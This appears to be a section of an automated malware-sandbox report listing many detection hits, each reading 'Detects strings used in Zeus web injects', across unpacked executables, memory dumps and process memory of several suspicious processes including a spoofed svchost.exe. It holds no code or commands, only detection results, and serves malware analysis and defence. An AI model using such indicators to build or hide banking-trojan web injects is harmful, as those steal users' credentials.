Source: 2.3.svchost.exe.4900000.48.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 22.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.24a0000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0.2.uavINoSIQh.exe.407000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 22.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.a52000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.83.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 8.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.1510000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2700000.33.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2700000.58.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.2.svchost.exe.24a6c00.4.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2500000.6.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.e2c0000.39.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.43c0000.51.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2700000.60.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.81.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.78.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.2.svchost.exe.2640000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 26.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.2090000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0.2.uavINoSIQh.exe.406400.0.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.2.svchost.exe.407000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.72.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2700000.57.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.2.svchost.exe.407000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 39.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.e82000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.884000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2700000.43.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.74.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0.2.uavINoSIQh.exe.407000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2700000.42.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.2.svchost.exe.2640000.5.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 24.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.3060000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0.3.uavINoSIQh.exe.59d700.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 5.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.1320000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.70.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.85.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2500000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2700000.60.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.71.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 39.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.e82000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 28.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.2aa0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.78.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 31.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.28d2000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 13.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.2d60000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2700000.59.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2700000.54.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.70.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.84.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2700000.52.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 22.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.a52000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 19.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.24b2000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2700000.54.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2700000.58.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.e040000.40.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.79.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 6.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.1342000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.68.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 19.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.2550000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.e2c0000.39.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2700000.55.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 36.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.27f2000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.81.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.73.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1375813400.0000000002500000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1946484273.0000000002700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1991936635.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1729152425.0000000002700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1742494940.0000000002700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1945983887.0000000002700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1993648247.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1973545656.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000006.00000002.1835795519.00000000013E0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000008.00000002.1842592106.00000000014B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0000000D.00000002.1895695128.0000000002D60000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1951729466.0000000002700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000008.00000002.1844960712.0000000001510000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1727160280.0000000002700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000005.00000002.1860005149.00000000011C0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1989210596.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1953838270.0000000002700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0000001C.00000002.2003048692.0000000002AA0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1952570956.0000000002700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1987381593.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000024.00000002.2019868965.00000000027F0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000002.2599802364.0000000000400000.00000040.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0000001C.00000002.1961721864.0000000002700000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1833788305.000000000E440000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1990556597.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1990141474.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1908832402.0000000002700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0000001F.00000002.1989491611.00000000028D0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1951475762.0000000002700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1785353535.000000000E040000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000002.2613697268.00000000026A3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000013.00000002.1817738450.0000000002550000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0000001A.00000002.1912799660.0000000000620000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1992609044.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1986892750.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0000001F.00000002.2028413256.0000000002AD0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1990784725.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1973353596.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1993059041.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000000.00000002.1360762384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000024.00000002.2034641560.0000000002AB0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1768859542.0000000002700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000018.00000002.1854156512.0000000002C70000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1810638614.0000000002700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1963515369.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1973821759.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0000000D.00000002.1889058917.0000000002D00000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1986550806.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1972618902.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000002.2611248672.0000000002450000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000011.00000002.1812866141.0000000002260000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1964073452.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000000.00000003.1357318901.0000000000597000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1373943903.0000000000884000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1972290685.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1945209264.0000000002700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000016.00000002.1820145637.0000000000A50000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000006.00000002.1832859184.0000000001340000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1819357336.0000000002700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1939680900.0000000002700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1374033112.0000000000884000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1965323651.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1849125917.0000000004900000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000027.00000002.2056889554.0000000000E80000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1991341795.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1964333284.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000016.00000002.1841274589.00000000024A0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000002.2611248672.00000000024A6000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1987592676.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1936202051.0000000002700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1877311393.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1994177586.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000027.00000002.2057701274.0000000000EE0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000005.00000002.1873138668.0000000001320000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000011.00000002.1813283213.00000000022C0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0000001A.00000002.1934748852.0000000002090000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1972865082.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1779871289.000000000E2C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000018.00000002.1875591417.0000000003060000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000013.00000002.1817233105.00000000024B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: uavINoSIQh.exe PID: 7384, type: MEMORYSTRMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: svchost.exe PID: 7444, type: MEMORYSTRMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe PID: 4084, type: MEMORYSTRMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe PID: 2604, type: MEMORYSTRMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe PID: 6304, type: MEMORYSTRMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe PID: 4628, type: MEMORYSTRMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe PID: 6964, type: MEMORYSTRMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe PID: 5632, type: MEMORYSTRMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
